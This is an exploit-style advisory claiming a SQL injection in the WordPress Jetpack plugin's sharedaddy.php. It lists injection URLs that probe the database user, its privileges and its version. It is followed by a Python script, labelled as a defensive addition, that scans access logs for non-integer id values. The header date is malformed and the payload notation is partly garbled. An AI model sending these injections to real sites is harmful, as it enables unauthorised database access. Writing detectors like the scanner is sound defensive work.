# Exploit Title: WordPress Jetpack plugin SQL Injection Vulnerability
# Date: 2011-19-11
# Author: longrifle0x
# Software: WordPress
# Download: http://wordpress.org/extend/plugins/jetpack/
# Tools: SQLMAP
Jetpack is a WordPress plugin that supercharges your self-hosted WordPress site with the awesome cloud power of WordPress.com. A SQL injection vulnerability has been found by longrifle0x in this plugin.
File: wp-content/plugins/jetpack/modules/sharedaddy.php
Exploit: id=-1; or 1=if
Exploitation:
http://localhost:80/wp-content/plugins/jetpack/modules/sharedaddy.php[GET][id=-1][CURRENT_USER()
http://localhost:80/wp-content/plugins/jetpack/modules/sharedaddy.php[GET][id=-1][SELECT(CASE WHEN ((SELECT super_priv FROM mysql.user WHERE user='None' LIMIT 0,1)='Y') THEN 1 ELSE 0 END)
http://localhost:80/wp-content/plugins/jetpack/modules/sharedaddy.php[GET][id=-1][MID((VERSION()),1,6)
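For defenders, the following added example (not part of the original advisory) scans web access logs for direct requests to the module named above whose `id` parameter is not a plain integer. It assumes combined log format and that legitimate `id` values are non-negative integers; the log lines are constructed samples.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Path named in the advisory.
MODULE_PATH = "/wp-content/plugins/jetpack/modules/sharedaddy.php"
# Client IP, request target and status from a combined-format log line.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)
# Assumption: a legitimate id is a non-negative integer.
PLAIN_ID = re.compile(r"\d+")

# Constructed sample log lines (documentation IP ranges, made-up timestamps).
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2012:10:02:11 +0000] "GET /wp-content/plugins/jetpack/modules/sharedaddy.php?id=-1 HTTP/1.1" 200 512 "-" "-"',
    '198.51.100.7 - - [01/Jan/2012:10:02:12 +0000] "GET /wp-content/plugins/jetpack/modules/sharedaddy.php?id=MID((VERSION()),1,6) HTTP/1.1" 200 498 "-" "-"',
    '203.0.113.20 - - [01/Jan/2012:10:05:40 +0000] "GET /wp-content/plugins/jetpack/modules/sharedaddy.php?id=42 HTTP/1.1" 200 1830 "-" "-"',
    '203.0.113.21 - - [01/Jan/2012:10:06:02 +0000] "GET /index.php?id=-1 HTTP/1.1" 200 9000 "-" "-"',
    '198.51.100.7 - - [01/Jan/2012:10:07:15 +0000] "GET /wp-content/plugins/jetpack/modules/sharedaddy.php?id=%252D1 HTTP/1.1" 200 512 "-" "-"',
]


def fully_decode(value):
    """Undo up to two extra layers of percent-encoding (parse_qs removes the first)."""
    for _ in range(2):
        value = unquote(value)
    return value


def scan(lines):
    """Return (ip, status, decoded id) for module requests with a non-integer id."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        # Normalise encoded characters and case before comparing the path.
        if unquote(url.path).lower() != MODULE_PATH:
            continue
        for value in parse_qs(url.query, keep_blank_values=True).get("id", []):
            decoded = fully_decode(value)
            if not PLAIN_ID.fullmatch(decoded):
                hits.append((m.group("ip"), int(m.group("status")), decoded))
    return hits


if __name__ == "__main__":
    for ip, status, value in scan(SAMPLE_LOG):
        print(f"{ip} status={status} id={value!r}")
```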